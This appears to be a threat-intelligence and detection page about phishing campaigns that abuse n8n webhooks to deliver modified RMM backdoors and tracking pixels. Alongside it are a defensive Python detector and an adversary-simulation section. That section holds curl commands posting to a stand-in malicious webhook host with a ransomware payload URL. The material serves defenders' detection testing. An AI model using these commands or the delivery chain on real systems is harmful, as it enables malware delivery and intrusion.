SOC Prime Bias: Medium

16 Apr 2026 15:14

Threat Actors Misuse n8n to Automate AI-Driven Attacks

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

Threat actors are exploiting the n8n low-code automation platform to distribute malicious payloads and profile email recipients. By embedding harmful webhook URLs in phishing messages, they can deliver executable files or MSI installers that deploy remote access tools on victim systems. The activity also includes the use of invisible tracking pixels that gather victim information as soon as the email is opened. This campaign highlights how a legitimate workflow automation service can be repurposed for malware delivery without requiring stolen credentials.

Investigation

Cisco Talos analyzed a series of phishing campaigns observed between October 2025 and March 2026 that relied on n8n webhook URLs embedded in email messages. The lures used fake OneDrive links that first displayed a CAPTCHA prompt before serving either a malicious .exe or MSI file. Once executed, the payloads installed modified versions of Datto or ITarian RMM tools and created scheduled tasks to maintain persistence. Talos also found fingerprinting activity through image tags that called n8n webhook URLs containing victim-specific identifiers.

Mitigation

Organizations should monitor for unusual outbound traffic to n8n-related domains from systems that would not normally use automation services and inspect for suspicious webhook URL patterns. URLs resolving to unknown subdomains of n8n.cloud should be blocked or detonated in a sandbox before user access is allowed. Email security controls should also be tuned to detect malicious HTML content, fake CAPTCHA flows, and hidden tracking pixels. Relevant IOCs, including webhook URLs and malicious file hashes, should be shared with threat intelligence platforms and internal defenders.

Response

Security teams should alert on the presence of n8n webhook URLs in email content or network telemetry and isolate any impacted hosts as soon as suspicious activity is confirmed. Any installed RMM tools and related scheduled tasks should be removed, followed by forensic analysis to uncover additional persistence or follow-on payloads. Firewall and proxy policies should be updated to restrict access to unauthorized n8n endpoints. Organizations should also complete a full IOC-sharing process across internal teams and trusted external partners.
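The checks the Mitigation and Response sections describe, as an added Python example that is not part of the SOC Prime content: it flags n8n webhook URLs and tiny or hidden, recipient-tagged tracking pixels in an email body, and applies the URL-plus-CAPTCHA-body criterion from the simulation below to proxy log lines. The hostnames, identifiers, the key=value log format and the sample inputs are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)

def is_n8n_webhook(url):
    """Host under n8n.cloud, or any host serving n8n's /webhook/ paths (self-hosted)."""
    u = urlsplit(url)
    host = (u.hostname or "").lower()
    return host == "n8n.cloud" or host.endswith(".n8n.cloud") or u.path.startswith(("/webhook/", "/webhook-test/"))

class PixelScanner(HTMLParser):
    """Collect <img> tags calling an n8n webhook that look like tracking pixels
    (0/1-pixel or hidden, with a victim identifier carried in the query string)."""
    def __init__(self):
        super().__init__()
        self.pixels = []
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        src = a.get("src", "")
        if tag != "img" or not src or not is_n8n_webhook(src):
            return
        tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
        hidden = "display:none" in a.get("style", "").replace(" ", "").lower()
        if (tiny or hidden) and urlsplit(src).query:
            self.pixels.append(src)

def scan_email_html(html):
    """Return (n8n webhook URLs, tracking-pixel URLs) found in an email body."""
    urls = sorted({u for u in URL_RE.findall(html) if is_n8n_webhook(u)})
    p = PixelScanner()
    p.feed(html)
    return urls, p.pixels

LOG_RE = re.compile(r'method=(?P<m>\w+) url=(?P<u>\S+)(?: body="(?P<b>[^"]*)")?')  # constructed log format

def match_proxy_line(line):
    """Rule from the simulation: URL contains n8n.cloud/webhook and body contains CAPTCHA."""
    m = LOG_RE.search(line)
    if m and "n8n.cloud/webhook" in m["u"].lower() and "captcha" in (m["b"] or "").lower():
        return m["u"]
    return None

# Constructed samples; hostnames, paths and tokens are made up for this example.
SAMPLE_HTML = ('<p>Your file is ready: <a href="https://acme-docs.app.n8n.cloud/webhook/share">Open</a></p>'
               '<img src="https://acme-docs.app.n8n.cloud/webhook/px?rid=u-7f3a2c" width="1" height="1">')
SAMPLE_LOGS = [
    'ts=2026-03-02T10:15:01Z src=10.0.0.5 method=POST url=https://acme-docs.app.n8n.cloud/webhook/share body="CAPTCHA=solved123"',
    'ts=2026-03-02T10:15:09Z src=10.0.0.5 method=GET url=https://example.org/index.html',
]
```

Matching on the /webhook/ path as well as the n8n.cloud host keeps self-hosted n8n instances in scope, which the domain-only block in Mitigation would miss.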

Attack Flow

    graph TB
    %% Class Definitions
    classDef action fill:#99ccff
    classDef tool fill:#ffcc99
    classDef malware fill:#ff9999
    classDef process fill:#ccccff
    %% Nodes
    action_phishing["<b>Action</b> – <b>T1566 Phishing</b>: Threat actors send malicious emails containing n8n webhook URLs to lure victims.<br/><b>Description</b>: Phishing attempts to deliver malicious content via email."]
    class action_phishing action
    tool_webhook["<b>Tool</b> – <b>Name</b>: n8n webhook<br/><b>Description</b>: Custom web endpoint used to deliver payloads."]
    class tool_webhook tool
    action_user_execution["<b>Action</b> – <b>T1204.001 User Execution: Malicious Link</b>: Victim clicks the webhook link, causing the browser to request the URL.<br/><b>Description</b>: User interacts with malicious content."]
    class action_user_execution action
    action_exfil_webhook1["<b>Action</b> – <b>T1567.004 Exfiltration Over Webhook</b>: Webhook returns a malicious HTML page with a CAPTCHA and streams a payload (EXE or MSI) while serving tracking pixels.<br/><b>Description</b>: Uses a web service to deliver and exfiltrate data."]
    class action_exfil_webhook1 action
    malware_payload_exe["<b>Malware</b> – <b>Name</b>: Payload EXE/MSI<br/><b>Description</b>: Executable that runs PowerShell to install a modified RMM tool."]
    class malware_payload_exe malware
    action_powershell["<b>Action</b> – <b>T1059.001 PowerShell</b>: Downloaded executable runs PowerShell commands to configure and install the modified RMM tool.<br/><b>Description</b>: Command and scripting interpreter."]
    class action_powershell action
    malware_rmm["<b>Malware</b> – <b>Name</b>: Modified RMM backdoor<br/><b>Description</b>: Remote monitoring and management tool used for persistence."]
    class malware_rmm malware
    action_service_execution["<b>Action</b> – <b>T1569.002 Service Execution</b>: RMM tool is installed as a Windows service for persistence.<br/><b>Description</b>: Executes via a system service."]
    class action_service_execution action
    action_scheduled_task["<b>Action</b> – <b>T1053 Scheduled Task/Job</b>: A scheduled task is created to ensure the RMM tool runs persistently.<br/><b>Description</b>: Ensures recurring execution."]
    class action_scheduled_task action
    action_msi_execution["<b>Action</b> – <b>T1218.007 Msiexec</b>: Malicious MSI is executed via msiexec to deploy the RMM backdoor.<br/><b>Description</b>: System binary proxy execution."]
    class action_msi_execution action
    action_exfil_webhook2["<b>Action</b> – <b>T1567.004 Exfiltration Over Webhook</b>: Invisible tracking pixel loads the webhook to capture email open events and device information for reconnaissance."]
    class action_exfil_webhook2 action
    %% Connections
    action_phishing -->|delivers| tool_webhook
    tool_webhook -->|triggers| action_user_execution
    action_user_execution -->|leads to| action_exfil_webhook1
    action_exfil_webhook1 -->|delivers| malware_payload_exe
    malware_payload_exe -->|executes| action_powershell
    action_powershell -->|installs| malware_rmm
    malware_rmm -->|persists via| action_service_execution
    action_service_execution -->|creates| action_scheduled_task
    action_scheduled_task -->|supports| action_msi_execution
    action_msi_execution -->|deploys| malware_rmm
    malware_rmm -->|communicates via| action_exfil_webhook2

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:

    An attacker purchases a short‑lived domain that points to n8n.cloud/webhook. They create a malicious n8n workflow that, once triggered, serves a ransomware payload. The phishing email contains a link to a landing page with a CAPTCHA challenge. The victim solves the CAPTCHA, which the attacker’s JavaScript forwards as the value CAPTCHA=solved123 in the HTTP body of a POST request to the webhook. The webhook responds with a PowerShell downloader that executes the payload. This flow generates an HTTP request whose URL contains n8n.cloud/webhook and whose body contains the string CAPTCHA, perfectly matching the Sigma rule.

    # Step 1 – Victim completes CAPTCHA (simulated)
    CAPTCHA_TOKEN="solved123"

    # Step 2 – Craft the POST that mimics the victim's action (line continuations restored)
    curl -X POST "https://my.malicious-n8n.cloud/webhook/malicious-workflow" \
         -H "Content-Type: application/x-www-form-urlencoded" \
         --data-urlencode "CAPTCHA=${CAPTCHA_TOKEN}" \
         --data-urlencode "payload_url=https://malicious.example.com/ransomware.exe"

  • Regression Test Script:

    #!/usr/bin/env bash
    set -euo pipefail

    # Variables – adjust to your test environment
    WEBHOOK_HOST="my.malicious-n8n.cloud"
    WEBHOOK_PATH="/webhook/malicious-workflow"
    CAPTCHA_TOKEN="solved123"
    PAYLOAD_URL="https://malicious.example.com/ransomware.exe"

    echo "[*] Simulating CAPTCHA-driven n8n webhook abuse..."

    # Print only the HTTP status code; the response body is discarded
    curl -s -o /dev/null -w "%{http_code}\n" -X POST "https://${WEBHOOK_HOST}${WEBHOOK_PATH}" \
         -H "Content-Type: application/x-www-form-urlencoded" \
         --data-urlencode "CAPTCHA=${CAPTCHA_TOKEN}" \
         --data-urlencode "payload_url=${PAYLOAD_URL}"

    echo "[+] Simulation complete. Verify detection in SIEM."

  • Cleanup Commands:

    # If a real workflow was created for testing, delete it via the n8n UI or the
    # n8n public REST API (DELETE /api/v1/workflows/{id}, authenticated with an
    # X-N8N-API-KEY header). A DELETE against the webhook path itself does not
    # remove the workflow. Replace API_KEY and WORKFLOW_ID:
    curl -X DELETE "https://my.malicious-n8n.cloud/api/v1/workflows/WORKFLOW_ID" \
         -H "X-N8N-API-KEY: API_KEY"

    # Remove any temporary files (none created in this script)
    echo "[+] Cleanup finished."